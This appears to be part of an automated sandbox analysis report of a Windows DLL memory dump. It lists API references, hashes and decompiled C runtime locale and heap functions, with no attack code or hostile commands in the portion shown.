Part of subcall function 6D4614CE: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461566

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Locinfo::_$H_prolog3LocinfoLockit$GetctypeGetcvtLocinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_ctype
String ID:
API String ID: 1262428101-0
Opcode ID: 6d764ce9e64d0164d11d437e5c7420ad296022f680560cddc20fca43b04a7cc1
Instruction ID: 6ce2f715be56a6e7da69625fc68eeecc0c54def64766c4849f0c3225a505cf11
Opcode Fuzzy Hash: 6d764ce9e64d0164d11d437e5c7420ad296022f680560cddc20fca43b04a7cc1
Instruction Fuzzy Hash: 95F05EB1918795AFDB10DF50C441FAD77A4AF507AAF22440DE34AAB288DB745E00CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D488499, Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

std::ios_base::_Init.LIBCPMT ref: 6D48849F

Part of subcall function 6D487FAF: __EH_prolog3.LIBCMT ref: 6D487FB6
Part of subcall function 6D487FAF: std::locale::_Init.LIBCPMT ref: 6D487FFF

Part of subcall function 6D488BFE: __EH_prolog3.LIBCMT ref: 6D488C05

std::ios_base::_Addstd.LIBCPMT ref: 6D4884D8

Part of subcall function 6D461EEA: __CxxThrowException@8.LIBVCRUNTIME ref: 6D461F4E

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3Initstd::ios_base::_$AddstdException@8Throwstd::locale::_
String ID:
API String ID: 3866902965-0
Opcode ID: f5465332d492a3dfb33428f77e15b9de503ee84fdd0bcdb1cdbea56ceb3e7f99
Instruction ID: 6dc2f7a6f5f42f072981ef41a4d1a4019ddc1219feb62760b46112d348b49c98
Opcode Fuzzy Hash: f5465332d492a3dfb33428f77e15b9de503ee84fdd0bcdb1cdbea56ceb3e7f99
Instruction Fuzzy Hash: 6DF0E5316083546BD720D761D444F5BB7E8EF447B8F10441EEA825BA82D7B5F84087D0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4878D3, Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D4878DA
std::locale::_Init.LIBCPMT ref: 6D4878FB

Part of subcall function 6D487005: __EH_prolog3.LIBCMT ref: 6D48700C
Part of subcall function 6D487005: std::_Lockit::_Lockit.LIBCPMT ref: 6D487017
Part of subcall function 6D487005: std::locale::_Setgloballocale.LIBCPMT ref: 6D487032
Part of subcall function 6D487005: _Yarn.LIBCPMT ref: 6D487048
Part of subcall function 6D487005: std::_Lockit::~_Lockit.LIBCPMT ref: 6D487088

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 3152668004-0
Opcode ID: 4e9d593cdda8be482c72c57fbf0f8124ac2043bd3d335062abdfcdbab8488329
Instruction ID: ceb17bfafb660c624dc8eaaaca6ca67ff9a1c10ffecb0081bb11b5c9e25429c7
Opcode Fuzzy Hash: 4e9d593cdda8be482c72c57fbf0f8124ac2043bd3d335062abdfcdbab8488329
Instruction Fuzzy Hash: B6E0DF72F6D6216BE311E7658511F2CB2906F80B99F67000DE2419F28ACFA0CC0043C2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CD9CA, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 6D4CC7EF: HeapAlloc.KERNEL32(00000008,?,00000000,?,6D4CD6B4,00000001,00000364,?,6D4A0F8B,00000002,00000000,?,?,?,6D461298,6D4875D9), ref: 6D4CC830

_free.LIBCMT ref: 6D4CD9EA

Part of subcall function 6D4CCBD3: HeapFree.KERNEL32(00000000,00000000,?,6D4DCFAF,00000000,00000000,00000000,00000000,?,6D4DD2B4,00000000,00000007,00000000,?,6D4DC0FC,00000000), ref: 6D4CCBE9
Part of subcall function 6D4CCBD3: GetLastError.KERNEL32(00000000,?,6D4DCFAF,00000000,00000000,00000000,00000000,?,6D4DD2B4,00000000,00000007,00000000,?,6D4DC0FC,00000000,00000000), ref: 6D4CCBFB

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$AllocErrorFreeLast_free
String ID:
API String ID: 3091179305-0
Opcode ID: c1991f024c2fcfd74ca2197f4b2dcfe4b49e5383834522ee5230ad89320bec15
Instruction ID: 3f3747ddb749add631355e0c646b391326dac8d25a7fce1249609fd67f651234
Opcode Fuzzy Hash: c1991f024c2fcfd74ca2197f4b2dcfe4b49e5383834522ee5230ad89320bec15
Instruction Fuzzy Hash: 3AF08CBAA44205AFC300DF69D441F5AB7F4EB48710F11416AEA18D7340E771AD108BD2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CF26D, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,6D4875D9,00000000,?,6D4A0F8B,00000002,00000000,?,?,?,6D461298,6D4875D9,00000004,00000000,00000000,00000000), ref: 6D4CF29F

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0a4f9ae9f2d8fb31c3b89033462d7275fe7d83ee0ab0db7d9a47cf10c95722f1
Instruction ID: 4b0a07c8f5e392a97745b9acb1d3766a8516ca0433f13326c5c9bc626788925c
Opcode Fuzzy Hash: 0a4f9ae9f2d8fb31c3b89033462d7275fe7d83ee0ab0db7d9a47cf10c95722f1
Instruction Fuzzy Hash: 4AE02B3E1071226BEB1156699C00F9B3B68EF833B0F220124DD24972C0CF2ACC00C1E3

Uniqueness

Uniqueness Score: -1.00%

Function 6D488BFE, Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D488C05

Part of subcall function 6D484A80: __EH_prolog3.LIBCMT ref: 6D484A87
Part of subcall function 6D484A80: std::_Lockit::_Lockit.LIBCPMT ref: 6D484A91
Part of subcall function 6D484A80: int.LIBCPMT ref: 6D484AA8
Part of subcall function 6D484A80: std::_Lockit::~_Lockit.LIBCPMT ref: 6D484AF8

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 1538362411-0
Opcode ID: 194a029727bd0d08e3078b0119f5cb5358e6a6aeea2786a3ffd703bcfac0a530
Instruction ID: 53a2d431c453db1628d8ae2e41fd226472ae904447a076ea9ee6f3e9d9ec4ce7
Opcode Fuzzy Hash: 194a029727bd0d08e3078b0119f5cb5358e6a6aeea2786a3ffd703bcfac0a530
Instruction Fuzzy Hash: 76F0A07AA09115ABDF04EB60C444EAD7775FF54205F1A000CDA026B284DF319E01CBE6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6D4DE6EC, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E6D4DE6EC(void* __ebx, void* __ecx, void* __edx, void* __edi, signed short _a4, short* _a8, char _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				short* _t56;
				short* _t57;
				short* _t58;
				int _t66;
				int _t68;
				short* _t72;
				intOrPtr _t75;
				void* _t77;
				short* _t78;
				intOrPtr _t85;
				short* _t89;
				short* _t92;
				void* _t94;
				short** _t102;
				short* _t103;
				signed short _t104;
				signed int _t107;
				void* _t108;

				_t39 =  *0x6d54506c; // 0x9d44929c
				_v8 = _t39 ^ _t107;
				_t3 =  &_a12; // 0x6d4ce03b
				_t89 =  *_t3;
				_t104 = _a4;
				_v28 = _a8;
				_v24 = E6D4CD5FF(_t89, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E6D4CD5FF(_t89, __ecx, __edx);
				_t8 =  &_v20; // 0x6d4ce03b
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) = _t8;
				_t92 = _t104 + 0x80;
				_t46 = _v24;
				 *_t46 = _t104;
				_t102 =  &(_t46[2]);
				 *_t102 = _t92;
				if(_t92 != 0 &&  *_t92 != 0) {
					_t85 =  *0x6d4f2f04; // 0x17
					E6D4DE68F(0, " )OmU", _t85 - 1, _t102);
					_t46 = _v24;
					_t108 = _t108 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if( *_t48 == _t99) {
						goto L19;
					}
					_t21 =  &_v20; // 0x6d4ce03b
					E6D4DE00E(_t92, _t99, _t21);
					_pop(_t92);
					goto L20;
				} else {
					_t72 =  *_t102;
					if(_t72 == 0 ||  *_t72 == _t99) {
						_t16 =  &_v20; // 0x6d4ce03b
						E6D4DE112(_t92, _t99, _t16);
					} else {
						_t15 =  &_v20; // 0x6d4ce03b
						E6D4DE077(_t92, _t99, _t15);
					}
					_pop(_t92);
					if(_v20 != 0) {
						_t103 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t75 =  *0x6d4f2dec; // 0x41
						_t77 = E6D4DE68F(_t99, "t!OmE", _t75 - 1, _v24);
						_t108 = _t108 + 0xc;
						if(_t77 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t104 = E6D4DE518(_t92,  ~_t104 & _t104 + 0x00000100,  &_v20);
								_pop(_t94);
								__eflags = _t104;
								if(_t104 == 0) {
									goto L22;
								}
								__eflags = _t104 - 0xfde8;
								if(_t104 == 0xfde8) {
									goto L22;
								}
								__eflags = _t104 - 0xfde9;
								if(_t104 == 0xfde9) {
									goto L22;
								}
								_t56 = IsValidCodePage(_t104 & 0x0000ffff);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = IsValidLocale(_v16, 1);
								__eflags = _t57;
								if(_t57 == 0) {
									goto L22;
								}
								_t58 = _v28;
								__eflags = _t58;
								if(__eflags != 0) {
									 *_t58 = _t104;
								}
								E6D4D45D6(_t89, _t94, _t103, __eflags, _v16,  &(_v24[0x128]), 0x55, _t103);
								__eflags = _t89;
								if(__eflags == 0) {
									L36:
									L23:
									return E6D49F8A5(_v8 ^ _t107, _t99, _t104);
								}
								E6D4D45D6(_t89, _t94, _t103, __eflags, _v16,  &(_t89[0x90]), 0x55, _t103);
								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t68 = GetLocaleInfoW(_v12, 0x1002,  &(_t89[0x40]), 0x40);
								__eflags = _t68;
								if(_t68 == 0) {
									goto L22;
								}
								E6D4E5124( &(_t89[0x80]), _t104,  &(_t89[0x80]), 0x10, 0xa);
								goto L36;
							}
							L22:
							goto L23;
						}
						_t78 =  *_t102;
						_t103 = 0;
						if(_t78 == 0 ||  *_t78 == 0) {
							E6D4DE112(_t92, _t99,  &_v20);
						} else {
							E6D4DE077(_t92, _t99,  &_v20);
						}
						_pop(_t92);
						goto L21;
					}
				}
			}

0x6d4de6f4
0x6d4de6fb
0x6d4de702
0x6d4de702
0x6d4de706
0x6d4de70a
0x6d4de718
0x6d4de71d
0x6d4de71e
0x6d4de71f
0x6d4de720
0x6d4de725
0x6d4de728
0x6d4de72a
0x6d4de730
0x6d4de736
0x6d4de739
0x6d4de73b
0x6d4de73e
0x6d4de742
0x6d4de749
0x6d4de756
0x6d4de75b
0x6d4de75e
0x6d4de761
0x6d4de761
0x6d4de763
0x6d4de766
0x6d4de76a
0x6d4de7da
0x6d4de7dc
0x6d4de7de
0x6d4de7f1
0x6d4de7f1
0x6d4de7f8
0x6d4de7fe
0x6d4de801
0x00000000
0x6d4de801
0x6d4de7e0
0x6d4de7e3
0x00000000
0x00000000
0x6d4de7e5
0x6d4de7e9
0x6d4de7ee
0x00000000
0x6d4de771
0x6d4de771
0x6d4de775
0x6d4de787
0x6d4de78b
0x6d4de77c
0x6d4de77c
0x6d4de780
0x6d4de780
0x6d4de794
0x6d4de795
0x6d4de81f
0x6d4de81f
0x00000000
0x6d4de79b
0x6d4de79b
0x6d4de7aa
0x6d4de7af
0x6d4de7b4
0x6d4de804
0x6d4de804
0x6d4de804
0x6d4de806
0x6d4de80a
0x6d4de821
0x6d4de82d
0x6d4de837
0x6d4de83a
0x6d4de83b
0x6d4de83d
0x00000000
0x00000000
0x6d4de83f
0x6d4de845
0x00000000
0x00000000
0x6d4de847
0x6d4de84d
0x00000000
0x00000000
0x6d4de853
0x6d4de859
0x6d4de85b
0x00000000
0x00000000
0x6d4de862
0x6d4de868
0x6d4de86a
0x00000000
0x00000000
0x6d4de86c
0x6d4de86f
0x6d4de871
0x6d4de873
0x6d4de873
0x6d4de884
0x6d4de889
0x6d4de88b
0x6d4de8eb
0x6d4de80e
0x6d4de81e
0x6d4de81e
0x6d4de89a
0x6d4de8aa
0x6d4de8b0
0x6d4de8b2
0x00000000
0x00000000
0x6d4de8c9
0x6d4de8cf
0x6d4de8d1
0x00000000
0x00000000
0x6d4de8e3
0x00000000
0x6d4de8e8
0x6d4de80c
0x00000000
0x6d4de80c
0x6d4de7b6
0x6d4de7b8
0x6d4de7bc
0x6d4de7d2
0x6d4de7c3
0x6d4de7c7
0x6d4de7c7
0x6d4de7d7
0x00000000
0x6d4de7d7
0x6d4de795

APIs

Part of subcall function 6D4CD5FF: GetLastError.KERNEL32(?,6D55CE94,6D4C1803,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD603
Part of subcall function 6D4CD5FF: _free.LIBCMT ref: 6D4CD636
Part of subcall function 6D4CD5FF: SetLastError.KERNEL32(00000000,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD677
Part of subcall function 6D4CD5FF: _abort.LIBCMT ref: 6D4CD67D

Part of subcall function 6D4CD5FF: _free.LIBCMT ref: 6D4CD65E
Part of subcall function 6D4CD5FF: SetLastError.KERNEL32(00000000,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD66B

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6D4DE7F8
IsValidCodePage.KERNEL32(00000000), ref: 6D4DE853
IsValidLocale.KERNEL32(?,00000001), ref: 6D4DE862
GetLocaleInfoW.KERNEL32(?,00001001,;Lm,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 6D4DE8AA
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 6D4DE8C9

Strings

t!OmE, xrefs: 6D4DE7A5
;Lm, xrefs: 6D4DE715, 6D4DE725, 6D4DE7E5, 6D4DE787, 6D4DE77C, 6D4DE77F, 6D4DE78A, 6D4DE7E8
;Lm, xrefs: 6D4DE821, 6D4DE7C3, 6D4DE7CE
)OmU, xrefs: 6D4DE751
;Lm, xrefs: 6D4DE702, 6D4DE8A1

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: )OmU$;Lm$;Lm$;Lm$t!OmE
API String ID: 745075371-878682921
Opcode ID: 7c488855f2ee7bf9a482f966534ad95c530f3396194c71561159277159ba808a
Instruction ID: 9117819e45c3ad3066aba630ff8dd0c8fe971fb930b27f42b8a790f06084695f
Opcode Fuzzy Hash: 7c488855f2ee7bf9a482f966534ad95c530f3396194c71561159277159ba808a
Instruction Fuzzy Hash: C3516171A00206ABEF90DFA5CC94EBEB7B8BF45700F254039E5A4E7290EB70DD4187A1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DDD96, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E6D4DDD96(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr _a4, signed short* _a8, char _a12) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v40;
				signed int _v52;
				char _v252;
				short _v292;
				void* __esi;
				void* __ebp;
				void* _t34;
				short* _t35;
				intOrPtr* _t36;
				void* _t39;
				signed short* _t44;
				intOrPtr _t47;
				void* _t49;
				signed int _t52;
				signed int _t58;
				signed int _t60;
				signed int _t66;
				void* _t68;
				void* _t71;
				void* _t76;
				void* _t80;
				intOrPtr _t87;
				short* _t89;
				void* _t90;
				void* _t92;
				signed int _t94;
				void* _t95;
				intOrPtr* _t98;
				void* _t112;
				void* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				signed int* _t122;
				intOrPtr* _t125;
				signed short _t127;
				int _t129;
				void* _t130;
				signed int _t132;
				void* _t133;
				signed int _t134;

				_t115 = __edx;
				_push(__ecx);
				_push(__ecx);
				_push(__ebx);
				_push(__edi);
				_t34 = E6D4CD5FF(__ebx, __ecx, __edx);
				_t87 = _a4;
				_t94 = 0;
				_v12 = 0;
				_t3 = _t34 + 0x50; // 0x50
				_t125 = _t3;
				_t4 = _t125 + 0x250; // 0x2a0
				_t35 = _t4;
				 *((intOrPtr*)(_t125 + 8)) = 0;
				 *_t35 = 0;
				_t6 = _t125 + 4; // 0x54
				_t118 = _t6;
				_v8 = _t35;
				_t36 = _t87 + 0x80;
				 *_t125 = _t87;
				 *_t118 = _t36;
				if( *_t36 != 0) {
					E6D4DDD27(" )OmU", 0x16, _t118);
					_t133 = _t133 + 0xc;
					_t94 = 0;
				}
				_push(_t125);
				if( *((intOrPtr*)( *_t125)) == _t94) {
					E6D4DD652(_t87, _t94, _t115, _t118, __eflags);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t118)) == _t94) {
						E6D4DD775();
					} else {
						E6D4DD6DB(_t94);
					}
					_pop(_t95);
					if( *((intOrPtr*)(_t125 + 8)) == 0) {
						_t80 = E6D4DDD27("t!OmE", 0x40, _t125);
						_t133 = _t133 + 0xc;
						if(_t80 != 0) {
							_push(_t125);
							if( *((intOrPtr*)( *_t118)) == 0) {
								E6D4DD775();
							} else {
								E6D4DD6DB(0);
							}
							L12:
							_pop(_t95);
						}
					}
				}
				if( *((intOrPtr*)(_t125 + 8)) == 0) {
					L31:
					_t39 = 0;
					__eflags = 0;
					goto L32;
				} else {
					_t127 = E6D4DDBAF(_t95, _t87 + 0x100, _t125);
					if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
						goto L31;
					} else {
						_t44 = _a8;
						if(_t44 != 0) {
							 *_t44 = _t127;
						}
						_t13 =  &_a12; // 0x6d4ce042
						_t121 =  *_t13;
						if(_t121 == 0) {
							L30:
							_t39 = 1;
							goto L32;
						} else {
							_t98 = _v8;
							_t89 = _t121 + 0x120;
							 *_t89 = 0;
							_t116 = _t98 + 2;
							do {
								_t47 =  *_t98;
								_t98 = _t98 + 2;
							} while (_t47 != _v12);
							_t100 = _t98 - _t116 >> 1;
							_push((_t98 - _t116 >> 1) + 1);
							_t49 = E6D4DD5B2(_t98 - _t116 >> 1, _t89, 0x55, _v8);
							_t134 = _t133 + 0x10;
							_t153 = _t49;
							if(_t49 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E6D4C2188();
								asm("int3");
								_t132 = _t134;
								_t52 =  *0x6d54506c; // 0x9d44929c
								_v52 = _t52 ^ _t132;
								_push(_t89);
								_push(_t127);
								_push(_t121);
								_t90 = E6D4CD5FF(_t89, _t100, _t116);
								_t122 =  *(E6D4CD5FF(_t90, _t100, _t116) + 0x34c);
								_t129 = E6D4DE4C7(_v40);
								asm("sbb ecx, ecx");
								_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								__eflags = _t58;
								if(_t58 != 0) {
									_t60 = E6D4D806D(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v252);
									__eflags = _t60;
									if(_t60 == 0) {
										_t66 = E6D4DE5FB(_t129);
										__eflags = _t66;
										if(_t66 != 0) {
											 *_t122 =  *_t122 | 0x00000004;
											__eflags =  *_t122;
											_t122[2] = _t129;
											_t122[1] = _t129;
										}
									}
									__eflags =  !( *_t122 >> 2) & 0x00000001;
								} else {
									 *_t122 =  *_t122 & _t58;
								}
								_pop(_t130);
								__eflags = _v12 ^ _t132;
								return E6D49F8A5(_v12 ^ _t132, _t116, _t130);
							} else {
								_t68 = E6D4D4323(_t100, _t153, _t89, 0x1001, _t121, 0x40);
								_t154 = _t68;
								if(_t68 == 0) {
									goto L31;
								} else {
									_t92 = _t121 + 0x80;
									if(E6D4D4323(_t100, _t154, _t121 + 0x120, 0x1002, _t92, 0x40) == 0) {
										goto L31;
									} else {
										_push(0x5f);
										_t71 = E6D4E7BBB(_t100);
										_t112 = _t92;
										if(_t71 != 0) {
											L28:
											if(E6D4D4323(_t112, _t157, _t121 + 0x120, 7, _t92, 0x40) == 0) {
												goto L31;
											} else {
												goto L29;
											}
										} else {
											_push(0x2e);
											_t76 = E6D4E7BBB(_t112);
											_t112 = _t92;
											_t157 = _t76;
											if(_t76 == 0) {
												L29:
												E6D4E5124(_t112, _t127, _t121 + 0x100, 0x10, 0xa);
												goto L30;
											} else {
												goto L28;
											}
										}
									}
								}
								L32:
								return _t39;
							}
						}
					}
				}
			}

0x6d4ddd96
0x6d4ddd9b
0x6d4ddd9c
0x6d4ddd9d
0x6d4ddd9f
0x6d4ddda0
0x6d4ddda5
0x6d4ddda8
0x6d4dddaa
0x6d4dddad
0x6d4dddad
0x6d4dddb0
0x6d4dddb0
0x6d4dddb6
0x6d4dddb9
0x6d4dddbc
0x6d4dddbc
0x6d4dddbf
0x6d4dddc2
0x6d4dddc8
0x6d4dddca
0x6d4dddcf
0x6d4dddd9
0x6d4dddde
0x6d4ddde1
0x6d4ddde1
0x6d4ddde5
0x6d4ddde9
0x6d4dde32
0x00000000
0x6d4dddeb
0x6d4dddf0
0x6d4dddf9
0x6d4dddf2
0x6d4dddf2
0x6d4dddf2
0x6d4dde00
0x6d4dde04
0x6d4dde0e
0x6d4dde13
0x6d4dde18
0x6d4dde1e
0x6d4dde22
0x6d4dde2b
0x6d4dde24
0x6d4dde24
0x6d4dde24
0x6d4dde37
0x6d4dde37
0x6d4dde37
0x6d4dde18
0x6d4dde04
0x6d4dde3d
0x6d4ddf4f
0x6d4ddf4f
0x6d4ddf4f
0x00000000
0x6d4dde43
0x6d4dde50
0x6d4dde56
0x00000000
0x6d4dde86
0x6d4dde86
0x6d4dde8b
0x6d4dde8d
0x6d4dde8d
0x6d4dde8f
0x6d4dde8f
0x6d4dde94
0x6d4ddf4a
0x6d4ddf4c
0x00000000
0x6d4dde9a
0x6d4dde9a
0x6d4dde9d
0x6d4ddea5
0x6d4ddea8
0x6d4ddeab
0x6d4ddeab
0x6d4ddeae
0x6d4ddeb1
0x6d4ddeb9
0x6d4ddebe
0x6d4ddec5
0x6d4ddeca
0x6d4ddecd
0x6d4ddecf
0x6d4ddf5a
0x6d4ddf5b
0x6d4ddf5c
0x6d4ddf5d
0x6d4ddf5e
0x6d4ddf5f
0x6d4ddf64
0x6d4ddf68
0x6d4ddf70
0x6d4ddf77
0x6d4ddf7a
0x6d4ddf7b
0x6d4ddf7f
0x6d4ddf85
0x6d4ddf8d
0x6d4ddf9c
0x6d4ddfa8
0x6d4ddfb9
0x6d4ddfbf
0x6d4ddfc1
0x6d4ddfd2
0x6d4ddfd9
0x6d4ddfdb
0x6d4ddfde
0x6d4ddfe4
0x6d4ddfe6
0x6d4ddfe8
0x6d4ddfe8
0x6d4ddfeb
0x6d4ddfee
0x6d4ddfee
0x6d4ddfe6
0x6d4ddff8
0x6d4ddfc3
0x6d4ddfc3
0x6d4ddfc5
0x6d4ddfff
0x6d4de000
0x6d4de00b
0x6d4dded5
0x6d4ddede
0x6d4ddee3
0x6d4ddee5
0x00000000
0x6d4ddee7
0x6d4ddee9
0x6d4ddf03
0x00000000
0x6d4ddf05
0x6d4ddf05
0x6d4ddf08
0x6d4ddf0e
0x6d4ddf11
0x6d4ddf21
0x6d4ddf34
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4ddf13
0x6d4ddf13
0x6d4ddf16
0x6d4ddf1c
0x6d4ddf1d
0x6d4ddf1f
0x6d4ddf36
0x6d4ddf42
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4ddf1f
0x6d4ddf11
0x6d4ddf03
0x6d4ddf51
0x6d4ddf57
0x6d4ddf57
0x6d4ddecf
0x6d4dde94
0x6d4dde56

APIs

Part of subcall function 6D4CD5FF: GetLastError.KERNEL32(?,6D55CE94,6D4C1803,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD603
Part of subcall function 6D4CD5FF: _free.LIBCMT ref: 6D4CD636
Part of subcall function 6D4CD5FF: SetLastError.KERNEL32(00000000,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD677
Part of subcall function 6D4CD5FF: _abort.LIBCMT ref: 6D4CD67D

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6D4CE042,?,?,?,?,6D4CDA1E,?,00000004), ref: 6D4DDE78
_wcschr.LIBVCRUNTIME ref: 6D4DDF08
_wcschr.LIBVCRUNTIME ref: 6D4DDF16
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,BLm,00000000,?), ref: 6D4DDFB9

Strings

BLm, xrefs: 6D4DDE8F, 6D4DDED7, 6D4DDF7F
t!OmE, xrefs: 6D4DDE09
)OmU, xrefs: 6D4DDDD4

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

